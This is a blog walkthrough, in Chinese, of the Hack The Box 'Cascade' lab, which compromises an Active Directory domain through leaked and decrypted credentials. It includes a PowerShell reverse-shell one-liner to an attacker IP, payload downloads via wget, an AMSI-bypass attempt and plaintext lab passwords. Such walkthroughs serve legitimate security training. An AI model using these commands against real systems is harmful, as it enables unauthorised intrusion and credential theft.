title: Hack The Box - Cascade(从域用户敏感信息泄露到反编译程序中敏感信息泄露再到域管理员敏感信息泄露) author: World'sEnd layout: true categories: 内网安全 tags:
• 打靶日记
You′re never a loser until you quit trying.
在停止尝试之前,你永远不是失败者。
Hack The Box - Cascade
# Nmap 7.92 scan initiated Sun Apr 24 20:24:15 2022 as: nmap -sV -sC -p- -Pn -T4 -oA nmap.txt 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.20s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-24 12:28:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-04-24T12:29:11
|_ start_date: 2022-04-24T12:22:25
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 24 20:29:54 2022 -- 1 IP address (1 host up) scanned in 339.82 seconds从Nmap的信息中我能读取到,目标的域为cascade.local。
DNS:
我可以尝试区域传输,不出意料会失败:
$ dig axfr @10.10.10.182 cascade.local
; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.182 cascade.local
; (1 server found)
;; global options: +cmd
; Transfer failed.RPC:
枚举用户名:
RPC如果不指定-N跳过密码验证的话,会不被允许访问,但是如果附加上 -N 就会被允许访问,我可以枚举一些用户信息:
$ rpcclient -U "" 10.10.10.182 -N
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
rpcclient $> 这样我就获取到了一本用户名字典,即使它们的名字看起来都很怪。
枚举组:
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[DnsUpdateProxy] rid:[0x44f]
rpcclient $> 系统版本被拒绝了:
rpcclient $> srvinfo
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED枚举共享也被拒绝了:
$> netshareenum
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED我尝试获取DC主机名,也失败了:
rpcclient $> getanydcname cascade.local
result was WERR_INVALID_COMPUTERNAME
rpcclient $> getdcname cascade.local
result was WERR_NERR_DCNOTFOUND
rpcclient $> RPC可以枚举很多很多东西,甚至可以添加用户,更改用户密码,但是都因为权限不够失败了:
rpcclient $> getanydcname cascade.local
result was WERR_INVALID_COMPUTERNAME
rpcclient $> getdcname cascade.local
result was WERR_NERR_DCNOTFOUND
rpcclient $> getdcname htb.local
result was WERR_NERR_DCNOTFOUND
rpcclient $> gettrustrid
result was WERR_ACCESS_DENIED
rpcclient $> adddriver
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumports
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdata
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumjobs
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumforms
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumalsgroups
Usage: enumalsgroups builtin|domain [access mask] [max_size]
rpcclient $> chgpasswd
Usage: chgpasswd username oldpass newpass
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> enumkey
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumjobs
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumprocs
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED 但是我发现了目标中另一个域:
rpcclient $> enumdomains
name:[CASCADE] idx:[0x0]
name:[Builtin] idx:[0x0]
rpcclient $>但是对于当下的我来说没有什么实质性的帮助,当下我的目标是要获取一个合法的域身份。
LDAP:
LDAP也是能够获取到很多信息的:
$ ldapsearch -x -b "dc=cascade,dc=local" -H ldap://10.10.10.182 > ldap.txt同时也会有很多对于我来说没什么用的垃圾信息,我可以总结很多搜索技巧,如果我希望搜索很多可以用来登录的用户,我可以搜索关键字userPrincipalName比如:
userPrincipalName: CascGuest@cascade.local以及远程登录名,比如:
sAMAccountName: Guests如果要搜索潜藏用户名的话,它们在LDAP返回的信息格式都是这样的:
# <名字> <类型> <所属域>像这样:
# DnsAdmins, Users, cascade.local
dn: CN=DnsAdmins,CN=Users,DC=cascade,DC=local
objectClass: top
objectClass: group
cn: DnsAdmins或是这样:
# MicrosoftDNS, System, cascade.local
dn: CN=MicrosoftDNS,CN=System,DC=cascade,DC=local
objectClass: top
objectClass: container
cn: MicrosoftDNS又或者这样:
# Read-only Domain Controllers, Users, cascade.local
dn: CN=Read-only Domain Controllers,CN=Users,DC=cascade,DC=local
# Enterprise Read-only Domain Controllers, Users, cascade.local
dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=cascade,DC=local如果服务账户会长这样:
# ArkSvc, Services, Users, UK, cascade.local
dn: CN=ArkSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person如果是正常用户会长这样:
# Steve Smith, Users, UK, cascade.local
dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
.....
sAMAccountName: s.smith
sAMAccountType: 805306368
userPrincipalName: s.smith@cascade.local在不断搜寻间,我发现了Ryan Thompson用户,他的远程登录名为:
sAMAccountName: r.thompson他的域内登录名为:
userPrincipalName: r.thompson@cascade.local让我注意到他的是因为他的信息中有一条:
cascadeLegacyPwd: clk0bjVldmE=确切的说是pwd让我很敏感。他看起来像是base64的编码:
$ echo "clk0bjVldmE=" | base64 -d
rY4n5eva似乎我获取到了一个口令。而且这似乎是该用户独有的属性,或许这是作者留给我的,至于LDAP返回给了我多少信息,我可以截个图切身实际感受一下:
SMB:
SMB不被允许匿名访问:
$ smbmap -H 10.10.10.182 -u whoami
[!] Authentication error on 10.10.10.182但是我可以尝试刚刚获取到的口令,crackmapexec可以为我快速的枚举一些东西:
$ crackmapexec smb 10.10.10.182 -u r.thompson -p rY4n5eva
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva但是winrm不行:
$ crackmapexec winrm 10.10.10.182 -u r.thompson -p rY4n5eva
SMB 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [-] cascade.local\r.thompson:rY4n5evawinrm不行意味着我无法通过evil-winrm登录到目标:
$ evil-winrm -i 10.10.10.182 -u r.thompson -p rY4n5eva
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1或许我应该在smb中找到其他答案:
$ smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ NO ACCESS
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share Data会很引人注意,很明显它是被人为放上来的而不是默认共享。
$ smbclient //10.10.10.182/Data -U r.thompson
Enter WORKGROUP\r.thompson's password:
Try "help" to get a list of possible commands.
smb: \> DIR
. D 0 Mon Jan 27 11:27:34 2020
.. D 0 Mon Jan 27 11:27:34 2020
Contractors D 0 Mon Jan 13 09:45:11 2020
Finance D 0 Mon Jan 13 09:45:06 2020
IT D 0 Wed Jan 29 02:04:51 2020
Production D 0 Mon Jan 13 09:45:18 2020
Temps D 0 Mon Jan 13 09:45:15 2020
6553343 blocks of size 4096. 1625321 blocks available
smb: \> cd Temps\
smb: \Temps\> dir
NT_STATUS_ACCESS_DENIED listing \Temps\*有些目录依旧会因为权限被拒绝,但是我发现了一个有趣的文件:
smb: \IT\Temp\s.smith\> dir
. D 0 Wed Jan 29 04:00:01 2020
.. D 0 Wed Jan 29 04:00:01 2020
VNC Install.reg A 2680 Wed Jan 29 03:27:44 2020
6553343 blocks of size 4096. 1624934 blocks available
smb: \IT\Temp\s.smith\> get "VNC Install.reg"
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (1.8 KiloBytes/sec) (average 1.9 KiloBytes/sec)
smb: \IT\Temp\s.smith\> windows的空格一直是个问题,我还会发现一个会议记录html:
smb: \IT\> cd "Email Archives"
smb: \IT\Email Archives\> ls
. D 0 Wed Jan 29 02:00:30 2020
.. D 0 Wed Jan 29 02:00:30 2020
Meeting_Notes_June_2018.html An 2522 Wed Jan 29 02:00:12 2020
6553343 blocks of size 4096. 1625190 blocks available
smb: \IT\Email Archives\> get Meeting_Notes_June_2018.html
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)
smb: \IT\Email Archives\>
TempAdmin与普通管理员密码相同。而在另一份reg文件中:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""他看起来像是一个远程登录的配置,似乎他比较懒散,密码都被放在里边,
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f即使我看不出来这是什么,但是没关系,我可以用vncpasswd.py的神奇工具解码这个十六进制字符串,该工具可在 GitHub 上轻松获得。这是下载工具链接的**链接**:
$ ./vncpasswd.py -d -H 6bcf2a4b6e5aca0f
Decrypted Bin Pass= 'sT333ve2'
Decrypted Hex Pass= '7354333333766532'我获取到了s.smith的密码sT333ve2。那我可以再对其进行检测:
$ crackmapexec winrm 10.10.10.182 -u s.smith -p sT333ve2
SMB 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
WINRM 10.10.10.182 5985 CASC-DC1 [+] cascade.local\s.smith:sT333ve2 (Pwn3d!)他可以用来被winrm登录,也可以查看smb共享。
以s.smith身份登录目标:
我登录到了目标:
$ evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> ls -force
Directory: C:\Users\s.smith\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hsl 1/13/2020 3:36 AM My Music
d--hsl 1/13/2020 3:36 AM My Pictures
d--hsl 1/13/2020 3:36 AM My Videos
*Evil-WinRM* PS C:\Users\s.smith\Documents>并且他有flag:
*Evil-WinRM* PS C:\Users\s.smith\Desktop> dir
Directory: C:\Users\s.smith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/24/2022 1:23 PM 34 user.txt
-a---- 2/4/2021 4:24 PM 1031 WinDirStat.lnk
*Evil-WinRM* PS C:\Users\s.smith\Desktop> type user.txt环境侦测:
*Evil-WinRM* PS C:\Users\s.smith\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\s.smith\Desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share Alias S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Audit Share Alias S-1-5-21-3332504370-1206983947-1165150453-1137 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT Alias S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users Alias S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
*Evil-WinRM* PS C:\Users\s.smith\Desktop> 目标系统还是windows_server_2008 R2,我可以检测一下目标是否存在ms14-068,我可以使用Metasploit来帮我检测,检测ms14-068需要域,用户名,口令,目标IP,用户SID,SID可以通过RPC获取到:
rpcclient $> lookupnames s.smith
s.smith S-1-5-21-3332504370-1206983947-1165150453-1107 (User: 1)msf-pro auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show options
Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN cascade.local yes The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD sT333ve2 yes The Domain User password
RHOSTS 10.10.10.182 yes The target host(s), see https://github.com/rapid7/met
asploit-framework/wiki/Using-Metasploit
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER s.smith yes The Domain User
USER_SID S-1-5-21-3332504370-1206983947 yes The Domain User SID, Ex: S-1-5-21-1755879683-36415771
-1165150453-1107 84-3486455962-1000
msf-pro auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > run
[*] Running module against 10.10.10.182
[*] Validating options...
[*] Using domain CASCADE.LOCAL...
[*] 10.10.10.182:88 - Sending AS-REQ...
[*] 10.10.10.182:88 - Parsing AS-REP...
[*] 10.10.10.182:88 - Sending TGS-REQ...
[+] 10.10.10.182:88 - Valid TGS-Response, extracting credentials...
[+] 10.10.10.182:88 - MIT Credential Cache saved on /opt/metasploit/apps/pro/loot/20220424221906_default_10.10.10.182_windows.kerberos_565346.bin
[*] Auxiliary module execution completed
msf-pro auxiliary(admin/kerberos/ms14_068_kerberos_checksum) >看起来是存在的,但是利用失败了,或许目标打了补丁:
$ ./goldenPac.py -dc-ip 10.10.10.182 -target-ip 10.10.10.182 cascade.local/s.smith@cascade.local
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[*] User SID: S-1-5-21-3332504370-1206983947-1165150453-1107
[-] Couldn't get forest info ([Errno Connection error (cascade.local:445)] [Errno -2] Name or service not known), continuing
[*] Attacking domain controller 10.10.10.182
[*] 10.10.10.182 seems not vulnerable (Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database))回到目标,我关不了反恶意软件扫描MSI:
*Evil-WinRM* PS C:\Users\s.smith> Bypass-4MSI
Error: An error of type WinRM::WinRMWSManFault happened, message is [WSMAN ERROR CODE: 1726]: <f:WSManFault Code='1726' Machine='10.10.10.182' xmlns:f='http://schemas.microsoft.com/wbem/wsman/1/wsmanfault'><f:Message>The WSMan provider host process did not return a proper response. A provider in the host process may have behaved improperly. </f:Message>f:WSManFault>
Error: Exiting with code 1不过没事,他并不影响winPEAS为我枚举目标环境信息:
*Evil-WinRM* PS C:\Users\s.smith> wget http://10.10.16.7/winPEASx86.exe -O winPEASx86.exe
*Evil-WinRM* PS C:\Users\s.smith> .\winPEASx86.exewinPEAS并没有为我枚举到什么,甚至可提权的漏洞也没有,只是为我确定了哪些用户可以被登录,但是我没有密码。如果可以,我还是希望反弹一个shell给我,因为Evil-WinRM实在太慢了。我可以通过power shell试试,本地编写shell.ps1文件:
$client = New-Object System.Net.Sockets.TCPClient("10.10.16.7",3333);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()获取并加载:
*Evil-WinRM* PS C:\Users\s.smith\Documents>
*Evil-WinRM* PS C:\Users\s.smith\Documents> wget http://10.10.16.7/shell.ps1 -O shell.ps1
*Evil-WinRM* PS C:\Users\s.smith\Documents> .\shell.ps1反弹:
$ nc -lvnp 3333
listening on [any] 3333 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.182] 49678
whoami
cascade\s.smith
PS C:\Users\s.smith\Documents> ls但是并没有什么用。目标机器中没有什么文件。甚至我连共享目录都没找到。
继续smb:
或许我应该再次探索smb,毕竟我获取到了一个新身份:
$ smbmap -H 10.10.10.182 -u s.smith -p sT333ve2
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ READ ONLY
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share 我可以访问新的目录Audit$ :
$ smbclient //10.10.10.182/Audit$ -U s.smith
Enter WORKGROUP\s.smith's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jan 30 02:01:26 2020
.. D 0 Thu Jan 30 02:01:26 2020
CascAudit.exe An 13312 Wed Jan 29 05:46:51 2020
CascCrypto.dll An 12288 Thu Jan 30 02:00:20 2020
DB D 0 Wed Jan 29 05:40:59 2020
RunAudit.bat A 45 Wed Jan 29 07:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 14:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 14:38:38 2019
x64 D 0 Mon Jan 27 06:25:27 2020
x86 D 0 Mon Jan 27 06:25:27 2020
6553343 blocks of size 4096. 1611448 blocks available有很多很多东西:
smb: \> cd x86
smb: \x86\> dir
. D 0 Mon Jan 27 06:25:27 2020
.. D 0 Mon Jan 27 06:25:27 2020
SQLite.Interop.dll A 1246720 Sun Oct 27 14:34:20 2019
6553343 blocks of size 4096. 1611448 blocks available
smb: \x86\> cd ..
smb: \> mget *
Get file CascAudit.exe? yes
getting file \CascAudit.exe of size 13312 as CascAudit.exe (10.6 KiloBytes/sec) (average 10.6 KiloBytes/sec)
Get file CascCrypto.dll? yes
getting file \CascCrypto.dll of size 12288 as CascCrypto.dll (10.7 KiloBytes/sec) (average 10.6 KiloBytes/sec)
Get file RunAudit.bat? yes
getting file \RunAudit.bat of size 45 as RunAudit.bat (0.0 KiloBytes/sec) (average 7.2 KiloBytes/sec)
Get file System.Data.SQLite.dll? yes
getting file \System.Data.SQLite.dll of size 363520 as System.Data.SQLite.dll (109.1 KiloBytes/sec) (average 56.6 KiloBytes/sec)
Get file System.Data.SQLite.EF6.dll? yes
getting file \System.Data.SQLite.EF6.dll of size 186880 as System.Data.SQLite.EF6.dll (97.4 KiloBytes/sec) (average 65.5 KiloBytes/sec)
smb: \> dir
. D 0 Thu Jan 30 02:01:26 2020
.. D 0 Thu Jan 30 02:01:26 2020
CascAudit.exe An 13312 Wed Jan 29 05:46:51 2020
CascCrypto.dll An 12288 Thu Jan 30 02:00:20 2020
DB D 0 Wed Jan 29 05:40:59 2020
RunAudit.bat A 45 Wed Jan 29 07:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 14:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 14:38:38 2019
x64 D 0 Mon Jan 27 06:25:27 2020
x86 D 0 Mon Jan 27 06:25:27 2020
6553343 blocks of size 4096. 1611448 blocks available
smb: \x64\>
smb: \x64\> ls
. D 0 Mon Jan 27 06:25:27 2020
.. D 0 Mon Jan 27 06:25:27 2020
SQLite.Interop.dll A 1639936 Sun Oct 27 14:39:20 2019
6553343 blocks of size 4096. 1611447 blocks available
smb: \x64\> get SQLite.Interop.dll
getting file \x64\SQLite.Interop.dll of size 1639936 as SQLite.Interop.dll (496.4 KiloBytes/sec) (average 171.5 KiloBytes/sec)
smb: \x64\> 我觉得自己就像一个土匪,能拿的都拿,在DB目录中还会有一个文件:
smb: \DB\> ls
. D 0 Wed Jan 29 05:40:59 2020
.. D 0 Wed Jan 29 05:40:59 2020
Audit.db An 24576 Wed Jan 29 05:39:24 2020
6553343 blocks of size 4096. 1611447 blocks available
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (19.5 KiloBytes/sec) (average 163.5 KiloBytes/sec)它似乎是在执行着什么:
$ cat RunAudit.bat
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db" 我复制到我windows机器中,它会报错:
D:\新建文件夹>CascAudit.exe ".\Audit.db"
未经处理的异常: System.IO.FileNotFoundException: 未能加载文件或程序集“System.Data.SQLite, Version=1.0.112.0, Culture=neutral, PublicKeyToken=db937bc2d44ff139”或它的某一个依赖项。系统找不到指定的文件。
在 CascAudiot.MainModule.Main()
[已退出进程,代码为 3762504530 (0xe0434352)]我需要将人家目录还原:
PS D:\新建文件夹> .\RunAudit.bat
D:\新建文件夹>CascAudit.exe ".\Audit.db"
Error getting LDAP connection data From database: SQL logic error
no such table: LDAP
PS D:\新建文件夹>好吧,我可以找个工具SQLite browser。kali自带该工具:
在LDAP表中可以看到ArkSvc账户的加密口令BQO5l5Kj9MdErXx6Q6AGOw==,加密算法未知:
我可以看一眼ArkSvc属性:
*Evil-WinRM* PS C:\Users\s.smith\Documents> net user ArkSvc
User name arksvc
Full Name ArkSvc
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 5:18:20 PM
Password expires Never
Password changeable 1/9/2020 5:18:20 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/29/2020 10:05:40 PM
Logon hours allowed All
Local Group Memberships *AD Recycle Bin *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\s.smith\Documents> AD Recycle Bin有助于恢复已删除的 Active Directory 对象,而无需从备份中恢复、重新启动Active Directory 域服务或重新启动域控制器 (DC)。让我们回顾一下没有回收站的对象恢复是如何工作的。ArkSvc账户的密码我无法知晓,或许我可以通过RPC将其改掉:
rpcclient $> getdompwinfo
min_password_length: 5
password_properties: 0x00000000
rpcclient $> setuserinfo2 ArkSvc 23 'worldisend123!@#'
result: NT_STATUS_ACCESS_DENIED
result was NT_STATUS_ACCESS_DENIED
rpcclient $> 不过很抱歉,它因为权限拒绝了我。
以ArkSvc身份登录目标:
john or hashcat是猜解哈希的,当然我可以通过其他kerberos爆破工具爆破ArkSvc的弱口令,但我觉得那样会失去意义。那目前我除了一堆不知道做什么DLL与exe,没什么东西了,难道我要将其反编译么,我看了一眼机器的标签,好像是的,在它的标签中有Reversing,也就是逆向的意思,我还没正式接触过逆向,但我觉得可以试试,我可以用**dnSpy,关于反编译后要做的第一件事,就是找到程序的入口,一般都为main**函数:
尽管我没了解过C#,但是这些代码也会有一些熟悉的感觉,往下拉,会有一串看起来像密码的字符串:
虽然写代码我不太行,但读代码改代码我觉得还是可以的,这片代码中最关键的一点就是 password变量被赋予的值,encryptedString是从SQLITE中读取到的PWD转换为字符串后的值,并将其与c4scadek3y654321一起解密,看起来c4scadek3y654321是一串明文密钥,获取它就是解密我从数据库中看到的ArkSvc用户的密码。但是我不知道它的加密算法,我不知该如何解密,或许我还需要看看其他文件:
System.Data.SQLite.dll有一些publicKey,但似乎对我没什么用,它的key是一样的。我可以通过搜索功能去搜索一些关键字:
在CascCrypto.dll我发现了另一串像是密钥的字符串1tdyjCbY1Ix49842:
我可以去试着解密:
https://www.devglan.com/online-tools/aes-encryption-decryption解密成功了,我获取到了ArkSvc账户的口令w3lc0meFr31nd。我可以试着去登录:
$ evil-winrm -u ArkSvc -p w3lc0meFr31nd -i 10.10.10.182
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents> 特权提升:
我记得ArkSvc是回收站组,它可以恢复已经被删除的活动目录中的对象:
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
......
Deleted : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
*Evil-WinRM* PS C:\Users\arksvc\Documents> 可以从回收站中找到TempAdmin用户,我记得史密斯曾在会议html中说过,他与管理员账户的密码一样。我可以查看它的具体信息:
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
... ...
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
... ...似乎我看到了它的密码,我记得这些文档中的口令是通过base64编码的,就像我最开始碰到的r.thompson一样:
$ echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
